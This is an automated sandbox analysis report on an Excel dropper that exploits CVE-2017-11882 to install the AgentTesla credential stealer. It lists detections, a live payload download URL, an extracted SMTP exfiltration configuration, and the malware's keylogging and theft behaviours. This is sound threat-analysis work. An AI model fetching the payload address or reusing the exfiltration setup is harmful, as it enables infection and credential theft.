Analysis Report 0AX4532QWSA.xlsx

Overview

General Information

Sample Name: 0AX4532QWSA.xlsx
Analysis ID: 339305
MD5: 9b4eeaed62b4b0253a7a3205f771099d
SHA1: e7340dd8904b13bf4dbf842c56479ffdb969287c
SHA256: 9bbe5843787cdc023cff31aaa88ce4b91e52e013d5e4b543323b7eea2f5f51d3
Tags: VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://191.96.149.225/new.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: vbc.exe.960.5.memstr Malware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "oloyeboos@outlook.com", "ByHost: ": "mail.gammavilla.org:587", "Password: ": "", "From: ": "info@gammavilla.org"}
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00323551
Source: C:\Users\Public\vbc.exe Code function: 4x nop then jmp 00329FDDh 4_2_00329F60
Source: C:\Users\Public\vbc.exe Code function: 4x nop then jmp 00329FDDh 4_2_00329F68
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: mail.gammavilla.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 191.96.149.225:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 191.96.149.225:80

Networking:

barindex
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 217.174.152.38:587
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Jan 2021 19:42:45 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Wed, 13 Jan 2021 16:41:58 GMTETag: "c6400-5b8cad158905f"Accept-Ranges: bytesContent-Length: 812032Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 99 b4 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 5a 0c 00 00 08 00 00 00 00 00 00 8e 79 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 79 0c 00 4f 00 00 00 00 80 0c 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0c 00 0c 00 00 00 20 79 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 59 0c 00 00 20 00 00 00 5a 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 80 0c 00 00 06 00 00 00 5c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0c 00 00 02 00 00 00 62 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 79 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 ca 00 00 5c 80 00 00 03 00 00 00 4b 00 00 06 40 4b 01 00 e0 2d 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 42 00 00 00 01 00 00 11 00 73 15 00 00 0a 0a 06 16 16 02 28 16 00 00 0a 0b 12 01 28 17 00 00 0a 02 28 16 00 00 0a 0b 12 01 28 18 00 00 0a 6f 19 00 00 0a 00 02 06 73 1a 00 00 0a 28 1b 00 00 0a 00 02 03 28 1c 00 00 0a 00 2a 22 02 28 1d 00 00 0a 00 2a 00 1b 30 05 00 07 01 00 00 02 00 00 11 00 16 0a 00 72 01 00 00 70 0b 07 28 1e 00 00 0a 0d 09 39 e0 00 00 00 00 07 19 17 19 73 1f 00 00 0a 13 04 11 04 73 20 00 00 0a 13 05 00 38 9f 00 00 00 00 08 17 8d 61 00 00 01 25 16 1f 3d 9d 6f 21 00 00 0a 13 06 11 06 16 9a 6f 22 00 00 0a 72 69 00 00 70 28 23 00 00 0a 13 07 11 07 2c 71 00 11 06 17 9a 6f 22 00 00 0a 02 28 23 00 00 0a 13 08 11 08 2c 5a 00 2b 3a 00 08 17 8d 61 00 00 01 25 16 1f 3d 9d 6f 21 00 00 0a 13 09 11 09 16 9a 6f 22 00 00 0a 72 7b 00 00 70 28 23 00 00 0a 13 0a 11 0a 2c 0c 11 09 17 9a 12 00 28 24 00 00 0a 26 00 11 05 6f 25 00 00 0a 25 0c 72 87 00 00 70 6f 26 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 217.174.152.38 217.174.152.38
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEPOINTBG TELEPOINTBG
Source: Joe Sandbox View ASN Name: MAJESTIC-HOSTING-01US MAJESTIC-HOSTING-01US
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 217.174.152.38:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 191.96.149.225Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5384863.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 191.96.149.225Connection: Keep-Alive
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: mail.gammavilla.org
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp String found in binary or memory: http://127.0.0.1:
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.5.dr String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000005.00000002.2370524978.0000000006280000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000005.00000002.2368238555.00000000007FC000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: vbc.exe, 00000005.00000003.2257055628.000000000634D000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000005.00000003.2257073132.00000000062F0000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://gammavilla.org
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://mail.gammavilla.org
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000005.00000002.2371956308.0000000007B00000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/U

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global keyboard hook
Source: C:\Users\Public\vbc.exe Windows user hook set: 0 keyboard low level C:\Users\Public\vbc.exe Jump to behavior
Creates a window with clipboard capturing capabilities
Source: C:\Users\Public\vbc.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud:

barindex
Drops certificate files (DER)
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Jump to dropped file

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: protected documents the yellow above 25 26 27 28 29 30 31 32 33 34 35 36 37 38 " " " "
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_003200E8 4_2_003200E8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00322528 4_2_00322528
Source: C:\Users\Public\vbc.exe Code function: 4_2_00323551 4_2_00323551
Source: C:\Users\Public\vbc.exe Code function: 4_2_0032B544 4_2_0032B544
Source: C:\Users\Public\vbc.exe Code function: 4_2_00324598 4_2_00324598
Source: C:\Users\Public\vbc.exe Code function: 4_2_00327738 4_2_00327738
Source: C:\Users\Public\vbc.exe Code function: 4_2_00328BEA 4_2_00328BEA
Source: C:\Users\Public\vbc.exe Code function: 4_2_00322518 4_2_00322518
Source: C:\Users\Public\vbc.exe Code function: 4_2_0032ADA6 4_2_0032ADA6
Source: C:\Users\Public\vbc.exe Code function: 4_2_00326AF0 4_2_00326AF0
Source: C:\Users\Public\vbc.exe Code function: 4_2_003276F0 4_2_003276F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_003242E8 4_2_003242E8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00329F60 4_2_00329F60
Source: C:\Users\Public\vbc.exe Code function: 4_2_00329F68 4_2_00329F68
Source: C:\Users\Public\vbc.exe Code function: 4_2_01147138 4_2_01147138
Source: C:\Users\Public\vbc.exe Code function: 4_2_01142F28 4_2_01142F28
Source: C:\Users\Public\vbc.exe Code function: 4_2_01146C78 4_2_01146C78
Source: C:\Users\Public\vbc.exe Code function: 5_2_007814F8 5_2_007814F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00780747 5_2_00780747
Source: C:\Users\Public\vbc.exe Code function: 5_2_00780A38 5_2_00780A38
Source: C:\Users\Public\vbc.exe Code function: 5_2_007814E8 5_2_007814E8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00780758 5_2_00780758
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CA36FE 5_2_00CA36FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CAA898 5_2_00CAA898
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CAEA50 5_2_00CAEA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CACFB8 5_2_00CACFB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CAAD50 5_2_00CAAD50
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CA9D08 5_2_00CA9D08
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CA70D8 5_2_00CA70D8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CA6A90 5_2_00CA6A90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CAD6A8 5_2_00CAD6A8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CAA278 5_2_00CAA278
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CA5FC8 5_2_00CA5FC8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CA8DA8 5_2_00CA8DA8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00CAE368 5_2_00CAE368
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FA8A8 5_2_049FA8A8
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F40F8 5_2_049F40F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F4C30 5_2_049F4C30
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F4450 5_2_049F4450
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FD060 5_2_049FD060
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F95B8 5_2_049F95B8
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FE115 5_2_049FE115
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FC938 5_2_049FC938
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F86C0 5_2_049F86C0
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F5A08 5_2_049F5A08
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F8F90 5_2_049F8F90
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F9320 5_2_049F9320
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F9B5A 5_2_049F9B5A
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F8378 5_2_049F8378
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAC83 5_2_049FAC83
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FA8C9 5_2_049FA8C9
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FACC8 5_2_049FACC8
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FB0EC 5_2_049FB0EC
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F40E9 5_2_049F40E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FB01A 5_2_049FB01A
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F5003 5_2_049F5003
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAC3E 5_2_049FAC3E
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FB05F 5_2_049FB05F
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F4440 5_2_049F4440
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F507C 5_2_049F507C
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FA98F 5_2_049FA98F
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FADAD 5_2_049FADAD
Source: C:\Users\Public\vbc.exe Code function: 5_2_049F9B5A 5_2_049F9B5A
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FA9D4 5_2_049FA9D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FB1C4 5_2_049FB1C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FADF2 5_2_049FADF2
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FA90E 5_2_049FA90E
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAD0D 5_2_049FAD0D
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FB134 5_2_049FB134
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FA94A 5_2_049FA94A
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FB17C 5_2_049FB17C
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAD68 5_2_049FAD68
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAAA5 5_2_049FAAA5
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAEC1 5_2_049FAEC1
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAAEA 5_2_049FAAEA
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FE23B 5_2_049FE23B
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAE37 5_2_049FAE37
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FCE30 5_2_049FCE30
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FB62D 5_2_049FB62D
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FCA20 5_2_049FCA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAE7C 5_2_049FAE7C
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAA60 5_2_049FAA60
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAF90 5_2_049FAF90
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FABB2 5_2_049FABB2
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAFD5 5_2_049FAFD5
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAF06 5_2_049FAF06
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAB2F 5_2_049FAB2F
Source: C:\Users\Public\vbc.exe Code function: 5_2_049FAF4B 5_2_049FAF4B
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 0AX4532QWSA.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: new[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 4.0.vbc.exe.1310000.0.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 4.2.vbc.exe.1310000.2.unpack, ParentalControl/ParentalControl.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
